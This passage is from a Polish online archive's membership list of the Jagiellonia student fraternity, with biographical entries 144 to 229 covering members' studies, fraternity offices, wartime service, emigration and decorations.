 144. Tadeusz Około-Kułak, (15 maja 1904 w Siewiersku - 5 sierpnia 1933 w Warszawie) s. Kazimierza i Janiny z Góreckich, bratanek Władysława (Welecja), w 203 pułku ułanów w wojnie 1918-20, odznaczony Virtuti Militari, c. 1922/23, właściciel maj. Strzegocin k. Kutna, pochowany w Strzegocinie
 145. Szczepan Olchowicz, ( - maj 1926) członek Jagiellonii w Wiedniu, filister, w 1 dywizjonie art. konnej w wojnie 1918-20, oficer zawodowy, jako por. art. konnej poległ na Placu Zamkowym w Warszawie w obronie praworządności, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA
 146. Tadeusz Olchowicz, c. 1920/21, wystąpił

  Adam Ostromęcki, 1936 r.

 147. Adam Ostromęcki, ( - 1 lutego 1971 w Motevideo) student PW, c. 1932, i.p. “Ptifurka”, akt. 1932-39, w wojnie obronnej 1939 w 12 Baonie Pancernym, w kampanii francuskiej 1940 w 10 Brygadzie Kawalerii, następnie w 1 Pułku Pancernym w Angli, po wojnie na emigracji w Argentynie, odznaczony dwukrotnie Krzyżem Walecznych, po wojnie na emigracji w Argentynie

 148. Jan (Rawita-)Ostrowski, ( - 10 sierpnia 1977) członek Jagiellonii w Wiedniu, i.p. “Przeczyszczony”, od 1919 w 7 Dywizjonie Artylerii Konnej Wielkopolskiej, walczył na froncie wschodnim, oficer zawodowy, mjr dypl., artylerzysta, uczestnik wojny obronnej 1939, w czasie okupacji w AK, w obozie jenieckim w Murnau, odznaczony dwukrotnie Krzyżem Walecznych [być może Jan Baptysta hr. Rawita-Ostrowski (9 sierpnia 1894 w miejsc. Ujazd - 6 lutego 1981 w Krakowie) herbu Rawicz, s. Juliusza i Marii z hr. Tyszkiewiczów, pochowany na cmentarzu Rakowickim w Krakowie]

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

  Tadeusz Owczarzak, lata 50-te (?).

 149. Tadeusz Owczarzak, członek Jagiellonii w Wiedniu, i.p. “Baca”

 150. Romuald Panasewicz, (1908 - czerwiec 1991) s. Witolda i synem Witolda (komandora żeglugi wielkiej) i Klary z Korsaków, student WSH, c. 1927/28, i.p. “Pat”, akt. 1927/28-30, w kampanii francuskiej 1940 w 1 Pułku Artylerii Przeciwlotniczej, po wojnie na emigracji w Stanach Zjednoczonych
 151. Adam Paprocki, (1891 - 1940 w Dachau) herbu Jastrzębiec, s. Konstantego i Marii z Jeziorańskich, członek Jagiellonii w Wiedniu, i.p. “Ewa”, członek POW, od 1921 pierwszy prezes Koła Starych Strzech w Warszawie, zamordowany w obozie koncentracyjnym
 152. Zdzisław Paszkowski, ( - zm. 1935-39) student PW, c. 1924/25, akt. 1924/25-28

  Henryk de Phull, 1920 r.

 153. Henryk de Phull, (17 lipca 1891 w Warszawie - 11 listopada 1959 w Szczecinie) s. Eugeniusza (Jagiellonia) i Anny Wilhelminy z d. Ewest, absolwent Gimnazjum Stanisława Starszica w Warszawie, członek Jagiellonii w Wiedniu, i.p. “PH”, prezes sem. zim. 1912/13, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, pochowany w Szczecinie

 154. Tadeusz Piekarski, (ok. 1907 - 13 czerwca 1991) brat Wacława (Jagiellonia), student prawa UW, c. 1926/27, i.p. “Faworek”, akt. 1926/27-30, prezes 1929/30, w wojnie obronnej 1939 w 1 Pułku Strzelców Konnych, adwokat i wieloletni radca Ministerstwa Zdrowia, Instytutu Reumatologii i Instytutu Gruźlicy, pochowany na warszawskich Powązkach
 155. Wacław Piekarski, (1891 - 19 lutego 1964) brat Tadeusza (Jagiellonia), Wiedńczyk, i.p. “Knedel”, w wojnie 1918-20 w 201 Pułku Artylerii

  Marceli Pindelski, lata 50-te (?).

 156. Marceli Pindelski, ( - 10 października 1974) założyciel Jagiellonii, i.p. “Murzyn”, sekretarz sem. zim. (?) 1910/11,

 157. Andrzej Piniński, (8 lutego 1900 w Smoszewie - 21 lipca 1988) herbu Jastrzębiec, s. Adama Karola i Teresy z Zielińskich, w 3 pułku ułanów w wojnie 1918-20, student SGGW, c. 1924/25, i.p. “Szczygieł”, akt. 1924/25-32, w wojnie obronnej 1939 w kawalerii dywizyjnej w 10 Dywizji Piechoty, w niewoli niemieckiej, odznaczony Krzyżem Walecznych
 158. Stanisław Piniński, ( - 21 lipca 1988) w 3 pułku ułanów w wojnie 1918-20, student SGGW, c. 1924/25, i.p. “Szczygieł”, akt. 1924/25-32, w wojnie obronnej 1939 w kawalerii dywizyjnej w 10 Dywizji Piechoty, w niewoli niemieckiej, odznaczony Krzyżem Walecznych
 159. Adam Podkóliński, c. 1938/39, wystąpił
 160. Antoni Popławski, (19 czerwca 1892 w Warszawie - 1940 w Katyniu) s. Antoniego i Cecylii z Gruszczyńskich, członek Jagiellonii w Wiedniu, w 1918 w III Korpusie Polskim w Rosji, w wojnie 1918-20 w kawalerii, oficer zawodowy, mjr, m.in. w Wojskowym Instytucie Badań Inżynieryjnych oraz Biurze Badań Technicznych Broni Pancernej, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD, odznaczony Złotym Krzyżem Zasługi
 161. Stefan Pręgowski, (5 kwietnia 1919 w Warszawie - 2005) student filozofii UW, c. 1937/38, akt. 1937/38-39, aresztowany w 1940 i osadzony na Pawiaku, więziony w Sachsenhausen, Mauthausen, Gusen, zeznawał w procesach przeciw esesmanom z Mauthausen, po wojnie w handlu zagranicznym w Warszawie
 162. Antoni Pruski, (11 czerwca 1910 - 12 listopada 1988) herbu Leliwa, s. Karola i Stanisławy z d. Czaplicka, brat Stefana i Tadeusza (obaj Kujawja), c. 1935/36, i.p. “Miętus”, akt. 1935/36-39, sekretarz sem. zim. 1938/39
 163. Juliusz Przybyła, ( - zm. 1935-39) założyciel Jagiellonii
 164. Zygmunt Przyrembel, c. 1928/29, i.p. “Buc”, wystąpił
 165. Jerzy Przysiecki, ( - 1941) student PW, w 1 pułku ułanów w wojnie 1918-20, student PL Lwów 1927, c. 1921/22, i.p. “Dżaksa”, akt. 1921/22-28, wiceprezes 1925/26
 166. Raul Puszet de Puget, ( - 1965?) inicjator i założyciel Jagiellonii, i.p. “Rolo”, prezes sem. zim. (?) 1910/11, leśnik
 167. Jerzy Radlicz, (11 listopada 1900 - 3 października 1938) student PW, c. 1924/25, i.p. “Gawron”, akt. 1924/25-28, wystąpił
 168. Adam Radomyski, (16 marca 1893 w Smoleńsku - 1940 w Charkowie) s. Floriana i Róży z Krzaczkowskich, członek Jagiellonii w Wiedniu, żołnierz kawalerii armii carskiej, później I Korpusu Polskiego na Wschodzie, w wojnie 1919-21 w 7 Pułku Ułanów, a następnie od 1922 dowódca szwadronu przybocznego Prezydenta RP, ppłk kawalerii służby stałej WP, w wojnie obronnej 1939 dowódca baonu w Grupie “Żółkiew”, uczestnik obrony Lwowa, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD, odznaczony m.in. trzykrotnie Krzyżem Walecznych, Złotym Krzyżem Zasługi, Medalem Niepodległości
 169. Ludwik Rakowski, ( - 1965 w Polsce) członek Jagiellonii w Wiedniu, i.p. “Raczek”

  Mieczysław Reklewski, 1932/33 r.

 170. Mieczysław Reklewski, (4 grudnia 1913 - 5 sierpnia 1986) herbu Gozdawa, s. Wincentego i Marii z Winnickich, brat Tadeusza (Jagiellonia), student SGGW, c. 1929, i.p. “Pysio”, akt. 1929-32, sekretarz 1931/32, w wojnie obronnej 1939 w 5 Dywizjonie Artylerii Konnej, więzień oflagu XI a Osterode, po wojnie na emigracji we Włoszech i we Francji, pracownik FAO w Rzymie

  Tadeusz Reklewski, 1939 r.

 171. Tadeusz Reklewski, (5 marca 1918 w Mirogonowicach w pow. ostrowieckim - 7 października 1999 w Warszawie), herbu Gozdawa, s. Wincentego i Marii z Winnickich, brat Mieczysława (Jagiellonia), c. 1936, i.p. “Sportex, akt. 1936-39, sekretarz sem. let. 1937/38, inż. rolnik SGGW 1939

  Kazimierz Rochowicz, lata 20-te.

 172. Kazimierz Rochowicz, (1 marca 1900 w Warszawie - 24 października 1977 w Gdańsku) s. Jana i Ludwiki z d. Rudnicka, uczeń Gimnazjum w Moskwie, w I pułku ułanów I Korpusu Polskiego na Wschodzie, student i absolwent WSH w Warszawie, c. 1921/22, i.p. “Lejek”, akt. 1921/22-25, prezes ZPKA 1924-25 (III kadencja), Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, dyrektor firmy Kodak 1936-44, ppor. rez. kawalerii, w 1939 oficer Grupy Poleskiej KOP, uciekł z niewoli rosyjskiej, w czasie okupacji w Delegaturze Rządu, po wojnie dyrektor Urzędu Likwidacyjnego w Gdańsku 1945-51, zastępca dyrektora MHD w Gdańsku 1951-56, kierownik delegatury Centromor 1956-66, odznaczony Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, dwoma medali za wojnę 1918-20

 173. Mieczysław Rodkiewicz, ( - zm. 1935-39) c. 1934/35, i.p. “Budrys”
 174. Stanisław Rudowski, (1905 w Sosnowcu - 28 stycznia 1984 w Otwocku) z Rumoki, herbu Prus (II Wilczekosy), s. Szymona i Adeli z d. Gepner, brat stryjeczny Jerzego i Zygmunta, brat stryjeczny Józefa, Leonarda i Szymona (wszyscy Sarmatia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Michała (Corona), brat stryjeczny Jana (Praetoria), absolwent Gimnazjum w Sosnowcu, student PW, c. 1924/25, i.p. “Zygfryd”, akt. 1924/25-29, wiceprezes wewnętrzny ZPKA 1927-28 (VI kadencja), II wiceprezes 1927/28, prezes sem. let. 1927/28, inż. mech. PW, pochowany na warszawskich Powązkach
 175. Jerzy Ruszczyc, kuzyn Edwarda i Oskara (Arkonia), c. 1935/36, i.p. “Puszczyk”, akt. 1935/36-39, skreślony, zamordowany w ZSRR w niewyjaśnionych okolicznościach (łagry?)
 176. Tadeusz de Ruttie, ( - 26 maja 1968 w Anglii) student PW, w 1 pułku ułanów w wojnie 1918-20, student PW, c. 1924/25, i.p. “Buzi”, akt. 1924/25-32, I wiceprezes 1927/28, w wojnie obronnej 1939 w 7 Pułku Ułanów, w 1940 w Ośrodku Ofic. Kawalerii we Francji, następnie w dowództwie Dywizjonu Pociągów Pancernych w Anglii, po wojnie na emigracji w Wielkiej Brytanii, pochowany na North Sheen Cemetery w Richmond upon Thames w Londynie, odznaczony Krzyżem Walecznych
 177. Zbigniew de Ruttie, (2 sierpnia 1900 - 2 stycznia 1976 w Los Angeles) herbu Bojomir, absolwent Gimnazjum im. Ks. Józefa Poniatowskiego w Warszawie, ochotnik w 4 Pułku Ułanów Lubelskich w wojnie polsko-bolszewickiej 1918-20, student i absolwent (mgr inż. chemii) chemii w Warszawie, c. 1921/22, i.p. “Siarkowodór”, akt. 1921/22-25, dyrektor cukrowni w Kruszwicy, rtm. rez., w wojnie obronnej 1939 w stopniu por. w 18 Pułku Ułanów Pomorskich Pomorskiej Brygady Kawalerii w ramach Armii “Pomorze”, więzień oflagu II D Gross-Born, po wojnie na emigracji w Stanach Zjednoczonych, gdzie w 1955 uzyskał obywatelstwo amerykańskie, pochowany na warszawskich Powązkach
 178. Ludwik Sajkiewicz, (15 czerwca 1908 w maj. Hyża pod Zamościem - 31 marca 1965 w Warszawie) s. Adama (Konwent Polonia) i Zofii z Chrzanowskich, absolwent Gimnazjum w Zamościu, student SGGW, c. 1928, i.p. “Saja”, akt. 1928-31, sekretarz 1929/30, wiceprezes wewn. 1930/31, po studiach gospodarował w maj. rodzinnym w Hyży, po wojnie pracował w Centarli Hodowli Koni, pochowany na Cmentarzu Bródnowskim w Warszawie
 179. Bohdan Ostoja-Samborski, ( - 7 grudnia 1974) członek Jagiellonii w Wiedniu, i.p. “Biskup”, sekretarz sem. let. 1913/14, w oddziałach saperskich w armii carskiej, członek POW, pracownik konsulatu RP w Opolu 1935, kierownik departamentu konsularnego i prawnego MSZ, konsul generalny we Francji 1939, dowódca polskiego ruchu oporu na południ Francji ps. “Hipolit” (P.O.W.N.-”Monika”) , po wojnie na emigracji we Francji, pochowany w Beaujolais a Lancie, odznaczony Virtuti Militari, Polonia Restituta, Złotym Krzyżem Zasługi, kawaler Legii Honorowej
 180. Włodzimierz Leon Segda, założyciel Jagiellonii

  Bronisław Sierosławski, 1910-14

 181. Bronisław Sierosławski, (27 sierpnia 1890 w Szreniawie - 29 października 1939 w miejsc. Górna Grupa) s. Jana i Emilii z d. Gotschalk, absolwent Gimnazjum w Tarnowie, student i absolwent Hochschule fur Bodenkultur w Wiedniu 1910-14, członek Jagiellonii w Wiedniu, pracował m.in. jako administrator dóbr Lanckorońskich, a od 1928 nadleśniczy w Nadleśnictwie Osie, prawd. członek Związku Zachodniego, aresztowany przez Niemców we wrześniu 1939 i zamordowany w czasie masowej egzekucji w Górnej Grupie k. Świecia

 182. Janusz Skowroński, ( - 9 lipca 1980 w Warszawie) brat Włodzimierza (Kujawja), w 203 pułku ułanów w wojnie 1918-20, student SGGW, c. 1924/25, i.p. “Veto”, akt. 1924/25-30
 183. Józef Słanarz, ( - 30 września 1960 w Anglii) członek Jagiellonii w Wiedniu, żołnierz C.K.Armii Austriackiej, w 2 pułku art. w wojnie 1918-20,zawodowy oficer, ppłk. artylerii, w wojnie obronnej 1939 w 9 Pułku Artylerii Ciężkiej, w obozie jenieckim w Murnau, po wojnie na emigracji w Niemczech, odznaczony Virtuti Militari i Krzyżem Walecznych
 184. Ludwik Sławiński, ( - 1962) członek Jagiellonii w Wiedniu, prezes Koła Starych Strzech (Filistrów) 1939
 185. Tytus Sobota, założyciel Jagiellonii, i.p. “Wujek”, prezes sem. let. 1911/12, żołnierz 1 pułku art. polowej Armii gen. J. Hallera we Francji, w 20 pułku art. piechoty w wojnie 1918-20, deportowany do ZSRR, zamordowany w nieznanych okolicznościach

  Stanisław Sokołowski, 1932/33 r.

 186. Stanisław Sokołowski, (23 lipca 1912 w Warszawie - 3 maja 1945 w Niemczech), student WSH, c. 1932, oficer zawodowy, absolwent Szkoły Podchorążych Kawalerii w Grudziądzu (jako wyróżnienie otrzymał złotą szablę Prezydenta RP), rtm. kawalerii, w wojnie obronnej 1939 w 1 Pułku Strzelców Konnych, ranny, w 1940 w Ośrodku Ofic. Kawaleriiwe Francji, później w 24 Pułkku Ułanów w Szkocji, 1941 w Wyższej Szkole Wojennej, w 1942 zrzucony do Francji, w ruchu oporu ps. “Ziomek”, aresztowany przez Gestapo, oszadzony w obozie w Drancy pod Paryżem, a później w KL Neugamme, w czasie ewakuacji obozu w 1945 na statku “Cap-Arcona”, zatopiony przez bombowce RAF-u

 187. Zbigniew Sokołowski, (20 września 1900 w Wysocinie na Kujawach - 13 lipca 1972) herbu Gozdawa, s. Aleksandra, w 1 dywizjonie art. konnej w wojnie 1918-20, student PW, c. 1920, akt. 1920-28, pierwszy wiceprezes w Warszawie sem. zim. 1920/21, pierwszy sekretarz zewn. ZPKA 1922-23 (I kadencja), wiceprezes wewn. ZPKA 1925-27 (V kadencja), Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, mgr inż. chemii PW, w wojnie obronnej 1939 w 1 Dywizji Artylerii Konnej, więzień oflagu w Woldenbergu, dyrektor Tarchomińskich Zakładów Farmceutycznych, naczelny inż. Biura Projektów Przemysłu Farmaceutycznego, pracownik naukowy Instytutu Przemysłu Organicznego, odznaczony Krzyżem Virtuti Militari V kl., Krzyżem Srebrnym Virtuti Militari, dwukrotnie Krzyżem Walecznych, Orderem Sztandaru Pracy I kl., Odznaką Honorową m. st. Warszawy, pochowany na warszawskich Powązkach
 188. Andrzej Pereświet-Sołtan, student PW, c. 1926/27, akt. 1926/27-31, skreślony
 189. Stanislaw Sroka, ( - 18 sierpnia 1981) c. 1922/23, i.p. “Laszka”, żołnierz artylerii armii carskiej, a następnie w baterii art. konnej II Korpusu Polskiego na Wschodzie, w wojnie 1918-20 oficer łączności w Sztabie Generalnym, w wojnie obronnej 1939 w 1 Dywizjonie Artylerii Konnej, później oficer łącznikowy w RAF w Anglii, odznaczony Krzyżem Walecznych, po wojnie na emigracji w Stanach Zjednoczonych i Wielkiej Brytanii
 190. Stanisław Stoklasa (Stoklassa), ( - zm. 1935-39) członek Jagiellonii w Wiedniu
 191. Tadeusz Stupnicki, członek Jagiellonii w Wiedniu

  Antoni Suchorski, 1975 r.

 192. Antoni Suchorski, (1920 - 7 lipca 1996 w St. Helier w Wielkiej Brytani) c. 1938/39, absolwent SGH (?), w wojnie obronnej 1939 w 17 Pułku Ułanów Wielkopolskich w Armii “Poznań”, w kampanii francuskiej 1940 w 10 Brygadzie Kawalerii, następnie w 10 Pułku Strzelców Konnych w Anglii i kampanii 1944/45 na Zachodzie, po wojnie na emigracji w Wielkiej Brytanii

 193. Janusz Syski, ( - 1960) w 1 pułku ułanów w wojnie 1918-20, student PW, c. 1922/23, i.p. “Gibon”, akt. 1922/23-32

 194. Stefan Swida, członek Jagiellonii w Wiedniu
 195. Aleksander Szaynowski, członek Jagiellonii w Wiedniu, w 18 pułku art. piechoty w wojnie 1918-20,
 196. Zbigniew Szerypo, student PW, c. 1932, wystąpił

  Stanisław Szweycer, 1936 r.

 197. Stanisław Szweycer, (7 maja 1913 - 13 września 1939 pod Syrokomlą (?) herbu Zadora, s. Janusza i Marii z Kożuchowskich, brat Tomasza (Jagiellonia) i Andrzeja (Sarmatia), kuzyn Pawła (Sarmatia), c. 1933/34, ip. “Żąkil”, akt. 1933/34-39, olderman sem. zim. 1937/38, olderman sem. let. 1937/38, inż. rolnik, wach. podch. 1 Pułku Ułanów Krechowieckich, poległ w wojnie obronnej 1939, odznaczony Virtuti Militari

  Tomasz Szweycer, 1990 r.Tomasz Szweycer, 1937 r.

 198. Tomasz Zbigniew Szweycer, (16 kwietnia 1916 - 2 maja 2008 w Warszawie) herbu Zadora, s. Janusza i Marii z Kożuchowskich, brat Stanisława (Jagiellonia), brat Andrzeja (Sarmatia), kuzyn Pawła (Sarmatia), absolwent gimnazjum Towarzystwa Ziemi Mazowieckiej 1925-1934, student SGH, c. 1934, i.p. “Gapa”, akt. 1934-39, absolwent SGH 1938, ekonomista, dyrektor handlowy w Towarzystwie Połowów Dalekomorskich 1938-39, w wojnie obronnej 1939 w 1 Pułku Szwoleżerów, w czasie wojny zarządzał tartakiem w Mrozach pow. Mińsk Mazowiecki i prowadził firmę handlową w Warszawie, po wojnie prowadził małą fabrykę produkującą silniki elektryczne i biuro projektów elektrycznych 1945-50, pracował w zaopatrzeniu Centralnego Zarządu Budownictwa Przemysłowego, Ministerstwie Budownictwa Przemysłowego, Zaopatrzeniu Urządzeń Klimatyzacyjnych, od 1958 założyciel, organizator i dyrektor Biura Jakości przy Komitecie Normalizacji, za to odznaczony Złotym Krzyżem Zasługi i Krzyżem Kawalerskim OOP, pochowany na warszawskich Powązkach

 199. Kazimierz Święcicki, (17 marca 1904 - 8 lutego 1966 w Verdun we Francji) herbu Jastrzębiec, s. Tadeusza i Jadwiki z d. Gockowska, brat Jana (Lutyko-Venedya) i Stanisława (Jagiellonia), student UW, c. 1923/24, i.p. “Święcior”, akt. 1923/24-32, w dowództwie II Korpusu PSZ, po wojnie na emigracji we Francji
 200. Stanisław Święcicki, (30 kwietnia 1910 w Osięcinach - 18 stycznia 1945 w Radogoszczy) s. Tadeusza i Jadwigi z Gockowskich, brat Kazimierza (Jagiellonia) i Jana (Lutyko-Venedya), student WSH, c. 1930/31, akt. 1930/31-32, oficer zawodowy, por. kawalerii, w wojnie obronnej 1939 w 2 Pułku Ułanów, ranny, w czasie okupacji w AK, w 1944 mianowany dowódcą podokręgu “Kujawy”, aresztowany przez Gestapo, zamordowany i spalony w Radogoszczy pod Łodzią w początkach 1945

  Kordian Tarasiewicz, 1990 r.

 201. Kordian Tarasiewicz, (19 listopada 1910 w Warszawie - 16 grudnia 2013 w Warszawie) s. Michała (aktora) i Janiny z Marcinkowskich, absolwent Szkoły Ziemi Mazowieckiej 1929, student i absolwent ekonomii WSH (SGH), c. 1929, i.p. “Pluton”, akt. 1929-32, prezes, olderman, od 1934 dyrektor rodzinnej firmy wypalarni kawy “Pluton”, działacz samorządu gospodarczego, po wojnie po ogłoszeniu upadłości firmy “Pluton” w 1950 m.in. dyrektor Centrali Przemysłowo Handlowej “Inco” 1953-56, od 1959 członek zarządu, w latach 1963-77 naczelny dyrektor spółki “Libella” powstałej z inicjatywy Klubu Inteligencji Katolickiej w Warszawie i zespołu redakcyjnego miesięcznika “Więź”, od 1987 członek rady nadzorczej spółki i wieloletni jej przewodniczący, w okresie powojennym prezes Ogólnopolskiego Związku Hurtowników Spożywczych, członek zarządu Zrzeszenia Importerów i Eksporterów RP, prezes Izby Przemysłowo-Handlowej w Warszawie 1948-50, działacz Polskiego Związku Tenisowego, Społecznego Komitetu Opieki Nad Starymi Powązkami im. Jerzego Waldorffa oraz warszawskiego Klubu Inteligencji Katolickiej, autor wspomnień “Cały wiek w Warszawie” (Warszawa 2005) oraz książek “Opowieści tenisowe z myszką” (Warszawa 1992), “Zwycięskie meczbole”, “Kawa po warszawsku. Dzieje firmy Pluton”, “Przygody z kawą i herbatą” (Warszawa 2001), odznaczony m.in. prymasowskim orderem Ecclesiae Populoque servitium praestanti, Złotym Krzyżem Zasługi, Krzyżem Kawalerskim OOP, medalem Polskiego Związku Tenisowego oraz Polskiego Komitetu Olimpijskiego, odznakami honorowymi “Zasłużony Działacz Kultury” i “Zasłużony dla Kultury Polskiej”

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Karola Tarasiewicza-Mrowińskiego]

 202. Maciej (Stefan) Trębicki, student WSH, c. 1924/25, akt. 1924/25-31, skreślony
 203. Tadeusz Uchnast, c. 1925/26, akt. 1925, wystąpił
 204. Tadeusz Waberski, (10 maja 1913 w Warszawa (?) - sierpień 1986) student PW, c. 1931/32, i.p. “Moczymorda”, akt. 1931-39, w 1940 w Ośrodku Broni Pancernej we Francji, następnie w Centrum Wyszkolenia Broni Pancernych w Anglii, 1943-47 członek prezydium “P.A.K. Jagiellonia na Obczyźnie”
 205. Kazimierz Colonna Walewski, (1908 w Inczewie - 9 lipca 2001 w Gdańsku) herbu Pierzchała, s. Stefana i Joanny z Taczanowskich, prawd. brat Stefana (Jagiellonia), student SGGW, c. 1927, i.p. “Rafałek”, akt. 1927-32, olderman 1929/30, 1930/31 i 1931/32, właściciel maj. Smaszków, por. rez., w wojnie obronnej w Armii Łódź-Poznań oraz 1 Pułku Kaw. KOP, ciężko ranny, w powstaniu warszawskim w kontwywiadzie Komendy Głównej AK, absolwent SGGW, docent dr hab. nauk rolniczych w Instytucie JUNG w Puławach, pochowany na warszawskich Powązkach
 206. Stefan Collona Walewski, c. 1936/37, i.p. “Klapuś”, akt. 1936/37-39, w czasie okupacji w AK w 1 Pułku Szwoleżerów (zgr. “Góral”) [być może Stefan Colonna-Walewski (ur. ok. 1910 - ) herbu Pierzchała, s. Stefana i Joanny z Taczanowskich, prawd. brat Kazimierza (Jagiellonia)]
 207. Tadeusz Waśniewski, ( - 5 lipca 1972 w Polsce) student SGGW, student Akademii Rolniczej Cieszyn (1930), c. 1928 Jagiellonia, akt. 1928-31, później w Kujawji, olderman 1932/33, filister 1935

  Jan Marek Wereszczyński, 1932/33 r.

 208. Jan Marek Wereszczyński, ( - 1963) student SGGW, c. 1932, i.p. “Marek”,

 209. Władysław Wereszczyński, ( - 1958) student SGGW, c. 1929, i.p. “Irys”, akt. 1929-32, więzień oflagu w Woldenbergu, w wojnie obronnej 1939 w 9 Pułku Strzelców Konnych
 210. Jerzy Wierzbicki, ( - 10 września 1942 pod Amsterdamem) student SGGW, c. 1931, i.p. “Pilot”, akt. 1931-32, obserwator lotniczy, w PSZ-RAF, zginął w locie bojowym nad Holandią, leży na cmentarzu Grosswijk pod Amsterdamem (grób nr 39)
 211. Jan Wieszczycki, ( - 17 listopada 1981) c. 1922/23, więzień oflagu VI B Dössel,
 212. Tadeusz Wojciechowski, student SGGW, c. 1925/26, akt. 1925/26-29, wystąpił
 213. Zdzisław Wojciechowski, student UW, student USB Wilno (1929), c. 1928, akt. 1928-30, wystąpił
 214. Gwidon Wójtowicz, członek Jagiellonii w Wiedniu, wystąpił przed 1935 [prawd. s. Edmunda i Anieli z Christiani-Grabieńskiej]
 215. Jan Maria Wróblewski, ( - 5 czerwca 1970) student UW, c. 1928, i.p. “Bociana Łapa”, akt. 1929-32, w wojnie obronnej 1939 w 2 Pułku Ułanów, w kampanii francuskiej w oddziałach francuskich (9-me Subdivision, Niort), następnie w 9 Pułku Ułanów oraz H.Q. 21st Army Group, po wojnie na emigracji w Wielkiej Brytanii
 216. Czesław Wurm, członek Jagiellonii w Wiedniu

  Stanisław Wyganowski, 1990 r.

 217. Stanisław Wyganowski, (7 grudnia 1919 w Ligocie - 13 października 2017 w Warszawie) herbu Łodzia, s. Stefana i Marii z Karnkowskich, c. 1937, i.p. “Picuś II”, akt. 1937-39, w wojnie obronnej 1939 w 2 Pułku Szwoleżerów, w czasie okupacji w AK w 1 Pułku Szwoleżerów (zgr. “Góral”), absolwent WSH, dr nauk ekonomicznych, spejcjalista w zakresie ekonomii urbanistycznej, pierwszy po 1989 prezydent Warszawy

 218. Jerzy Wysocki, ( - 25 lipca 1980) student SGGW, c. 1926/27, i.p. “Pumps”, akt. 1926/27-29, w wojnie obronnej 1939 w 3 Pułku Strzelców Konnych, w obozie jenieckim w Murnau, 1947-48 I wiceprezes “P.K.A. Jagiellonia na Obczyźnie”, po wojnie na emigracji w Stanach Zjednoczonych, odznaczony Krzyżem Walecznych

  Czesław Wyszyński, lata 30-te.

 219. Czesław Wyszyński, (1906 w Szeptówce na Ukrainie - 30 września 1944 w Warszawie) syn Feliksa Franciszka i Janiny z Romańskich, student PW, c. 1924/25, akt. 1924/25-32, olderman 1927/28, wiceprezes wewn. 1928/29, olderman 1932/33, inż. chemik PW, po studiach kierownik laboratorium w Hucie Cynku w Lipinach, zachorował 1938, rozstrzelany przez Niemców w szpitalu na Bonifraterskiej w czasie powstania warszawskiego

 220. Lech (Leszek) Xiężopolski, student PW, c. 1930, i.p. “Skurcz”, akt. 1930-32, sekretarz 1932/33, wystąpił przed 1935
 221. Zbigniew Zieliński, (1910 - 4 sierpnia 1976 w Warszawie) student SGGW, c. 1932, i.p. “Ventrix”, akt. 1932-39, prezes sem. zim. 1937/38, olderman sem. zim. 1938/39, wiceprezes WKM sem. let. 1937/38, w wojnie obronnej 1939 w 4 Pułku Strzelców Konnych
 222. Feliks Zemanek, członek Jagiellonii w Wiedniu
 223. Stanisław Zimnoch, ( - przed 1970), student PW, c. 1924/25, akt. 1924/25-32
 224. Tadeusz Żarski, ( - po 1989) c. 1938/39, w kampanii francuskiej 1940 w I Dywizji Grenadierów, później w niewoli niemieckiej,
 225. Henryk Żebrowski, ( - 24 czerwca 1983) student WSH, c. 1927/28, i.p. “Patachon”, akt. 1927/28-32, po wojnie na emigracji w Stanach Zjednoczonych
 226. Stanisław Żebrowski, ( - 12 kwietnia 1979 w Paryżu) c. 1936/37, i.p. “Pincetka”, akt. 1936/37-39, w wojnie obronnej 1939 w 13 Pułku Ułanów, lekarz,
 227. Jerzy Żmigrodzki, założyciel Jagiellonii, później wystąpił

  Paweł Żółkowski, ok. 1920 r.

 228. Paweł Żółkowski, (1 stycznia 1892 w Kielcach – 26 sierpnia 1937 w Warszawie)- syn Kazimierza i Lucyny z Kopciów, absolwent Gimnazjum we Włocławku, przed I wojną światową student politechniki w Wiedniu oraz Akademii Górniczej w Loeben, po I wojnie światowej PW, członek Jagiellonii w Wiedniu, akt. 191?-1925, pierwszy sekretarz Jagiellonii w Warszawie sem. zim. 1920/21, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, ochotnik wojny polsko-sowieckiej, uczestnik walk o niepodległość, ułan krechowiecki, po studiach kierownik Rysowni Biura Technicznego Dyrekcji Wodociągów i Kanalizacji m.st. Warszawy, pochowany na warszawskich Powązkach

 229. Kazimierz Żywanowski, ( - 1965 w Polsce) student SGGW, c. 1924/25, i.p. “Fircyk”, akt. 1924/25-28

Okładka księgi 60-lecia Jagiellonii, Wielka Brytania 1970 r.

Listę członków opracowano na podstawie:

1) Jagiellonia MCMX - MCMXXXV, Warszawa 1935 (”Księga 25-lecia Jagiellonii”),
2) Jagiellonia 1910, wyd. 2, Wielka Brytania 1970 (”Księga 60-lecia Jagiellonii”),
3) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1925-1933,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Jagiellonia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 22 III 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Akademicka Korporacja Jagiellonia (Wiedeń, Warszawa, Londyn), (na:) www.archiwumkorporacyjne.pl, stan 22 III 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }